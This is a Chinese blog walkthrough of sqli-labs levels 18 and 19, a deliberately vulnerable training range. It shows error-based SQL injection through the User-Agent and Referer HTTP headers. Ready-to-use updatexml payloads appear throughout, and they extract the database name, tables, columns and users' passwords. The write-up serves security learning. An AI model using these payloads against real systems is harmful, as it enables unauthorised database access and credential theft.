sqli-labs less-18 http头user-agent注入

于 2024-10-08 22:57:57 发布
阅读量538 收藏 12
点赞数 16
分类专栏: sqli-labs靶场 文章标签: less http android 数据库 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wanggonghanfei/article/details/142767853
版权

HTTP头注入

常见的HTTP注入点产生位置为【Referer】、【X-Forwarded-For】、【Cookie】、【X-Real-IP】、【Accept-Language】、【Authorization】

HTTP Referer是header头的一部分,从哪个网页了链接过来的
X-Forwarded-For 简称XXF头,代表客户端,用来记录代理信息,每经过一级处理,代理服务器都把这次请求的来源IP追加在XFF头上
COOkie:指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)
X-Real-IP:是一个自定义的Header,一般只记录真实发出请求的客户端IP
Accept-Language 请求头允许客户端声明它可以理解的自然语言,以及优先选择的区域方言

本关卡是模拟登录情况下的注入。我们需要先登录一个账号,这里我以admin,admin为列。

在这里插入图片描述登入后页面回显IP和User-Agent,抓包在bp中进行测试

less-18

抓包

在这里插入图片描述
HTTP报文如上图,在实际的环境中,如果我们没有获取到网站源码,进行黑盒测试,就需要对每一个注入点进行测试,而在这个模拟环境中,我们知道源码,所以可以直接白盒测试。

源码

在这里插入图片描述
从源代码中我们可以看到POST的uname和passwd都做了check_input()处理,,所以表单不存在注入点。在登录成功后,Insert语句出错还会返回mysql的错误信息。
不论是否登录成功,都会回显IP。
登陆成功后回显uagent,并将uagent、IP、uname插入到security数据库的uagents表的uagent、ip_address、username三个字段中。
而且这里要输入正确的账号和密码才能绕过账号密码判断,进入处理User-Agent部分。这跟现实中的注册登录再注入是比较贴合。所以注入点就在User-Agent处,且是单引号型报错注入。

接下来开始注入

构造payload

源码insert语句为

INSERT INTO security.uagents (uagent, ip_address, username) VALUES (‘ u a g e n t ′ , ′ uagent', ' uagent,IP’, $uname)

所以我们构造

1’,2,3) #
闭合方式。不能使用--来注释,这是HTTP报文,不是URL,URL解释+为空格
1’ or updatexml(1,concat(0x7e,(select database())) or ',3) ,2,3) #
因为插入语句使用or来连接

得到数据库名
在这里插入图片描述

爆表

。’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) or ',2,3) #
在这里插入图片描述

爆列

User-Agent:' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3) or ',2,3) #
在这里插入图片描述

数据

User-Agent:’ or updatexml(1,concat(0x7e,substring((select group_concat(username,‘-’,password) from security.users),30,30)),3) or ',2,3) #
,因为报错回显只能有32个字符,使用sustring函数,通过修改substring的值,来获取所有数据

less-19

在这里插入图片描述
登入进去,页面回显IP和Referer
根据上一关,此次使用Referer来进行报错注入
使用方法与上一关一样,只不过将User-Agent的位置变成了Referer。

库名

Referer: ' or updatexml(1,concat(0x7e,(select database())),3) or',1,1) #

表名

Referer: ' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) or',1,1) #

列名

Referer: ' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3) or',1,1) #

数据

Referer: ' or updatexml(1,concat(0x7e,substring((select group_concat(username,':',password) from security.users),1,30)),3) or',1,1) #方法同less-18

子非鱼999
关注
专栏目录
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
本文旨在指导读者安装sqli-labs靶场环境,用于学习和练习SQL注入漏洞。sqli-labs是一款功能强大且易于使用的靶场环境,包含多种最新的漏洞,可以满足不同级别的用户需求。 为什么要使用本地Web靶场 在开始安装sqli...
sqli-labs靶场less-9和less-10
最新发布
wanggonghanfei的博客
10-06 737
dnslog注入通过less-9,10
sqli-labs靶场less-6使用updatexml函数报错注入
wanggonghanfei的博客
10-02 899
sqli-labs靶场less-6使用updatexml函数报错注入
sqli-labs靶场第二关less-2
wanggonghanfei的博客
10-01 399
本次测试在虚拟机搭建靶场,从主机测试。
sqli-labs靶场第三关less-3
wanggonghanfei的博客
10-01 794
sql注入靶场sqli-lans靶场less-3
SQl注入文件上传及sqli-labs第七关less-7
wanggonghanfei的博客
10-06 989
参数secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能导出导入。secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。可以使用下面语句查看该值:secure_file_priv的值可以修改,在MySQL安装路径下的my.ini文件中因为此次测试需要读写权限,我将其值修改为我的网站根目录。然后查询。
SQL注入靶场sqli-labs less-4
wanggonghanfei的博客
10-02 740
SQL注入靶场第四关less-4,
sqli-labs靶场第五关less-5
wanggonghanfei的博客
10-02 934
sqli-labs第五关less-5用extractvalue()函数报错注入
网络协议 TCP、UDP 和 HTTP
m0_68570169的博客
09-27 1919
特性TCPUDP连接方式面向连接(三次握手)无连接可靠性可靠(确认、重传、校验、排序)不可靠(不确认、不重传、不排序)传输顺序保证顺序到达不保证顺序流量控制有无拥塞控制有无部开销较大较小速度较慢(但可靠)较快(但不可靠)典型应用场景DNS、视频会议、在线游戏TCP和UDP各有优劣,选择使用哪种协议取决于具体的应用需求。如果需要数据可靠性和顺序性,TCP是更好的选择;如果对传输速度和实时性要求高,且能容忍部分数据丢失,则UDP更为适合。特性。
什么是 HTTP 请求中的 options 请求?
汪子熙的专家技术分享
10-03 1105
OPTIONS 请求作为 HTTP 方法中的一种,扮演着极为重要的角色,尤其是在跨域请求和 API 开发中。它为客户端提供了与服务器进行沟通和协商的手段,使得前后端的交互更加安全和灵活。开发者需要对 OPTIONS 请求的工作原理有清晰的理解,特别是在 CORS 场景下,通过正确配置服务器的 CORS 部,可以确保前端应用的稳定运行。
Ajax ( 是什么、URL、axios、HTTP、快速收集表单 )Day01
m0_74154295的博客
10-01 1449
- **同步**:适合那些必须按顺序执行,不能并行的任务,例如需要读取文件的每一行并按顺序处理。 - **异步**:适合那些可以并行处理的任务,尤其是需要等待外部资源的操作,比如网络请求、数据库访问等。
PYTHON实现HTTP request的一些有用的函数
weixin_41640959的博客
10-02 1354
我们知道,当需要设计一个程序和服务器进行交互时,往往会用到HTTP的request,即服务器有一个对外接口REST API,因此当向服务器发送符合格式要求的HTTP request时,服务器会给出响应,甚至执行一些任务。如需了解详情,请阅读。PYTHON是一种常见的编程语言,可以发送HTTP request,并接受从服务器中得到的反馈。博客中说明了一种使用PYTHON发送HTTP request并接受反馈数据的方法。当然,也可以使用JAVA,Swift,C#,Javascript等编程语言实现类似功能。
Android 14源码分析】WMS-窗口显示-流程概览与应用端流程分析
隔壁小王的博客
09-30 1145
WMS 负责管理设备上所有的 Window ,所以应用想显示一个 Window 则要通过 WMS 来完成。而 WMS 毕竟还是上层,窗口的内容要显示到屏幕上,还需要 SurfaceFlinger 来处理。应用端: 控制其内部的窗口的添加及 UI 绘制逻辑WMS 模块: 作为系统窗口管理模块,处理应用端的窗口显示逻辑应用端与 WMS 通信通过匿名 Binder -> Session 完成。
Android SystemUI组件(08)睡眠灭屏 锁屏处理流程
wangdsh的博客
10-02 1073
说明:本章节持续迭代之前章节的思维导图,主要关注左侧上方锁屏分析部分即可。Power按键的处理逻辑最终是由PhoneWindowManager来完成。想了解更多可参考输入子系统的相关文章。Android Framework 输入子系统(01)核心机制 inotify和epollAndroid Framework 输入子系统(02)核心机制 双向通信(socketpair+binder)Android Framework 输入子系统(03)输入系统框架。
安卓使用memtester进行内存压力测试
zmlovelx(帅得不敢出门 程序员群31843264)
09-30 991
memtester 是一个用于测试内存可靠性的工具。它可以对计算机的内存进行压力测试,以检测内存中的错误,例如位翻转、随机存取错误等。memtester 可以在不同的操作系统上运行,并且可以针对不同大小的内存进行测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值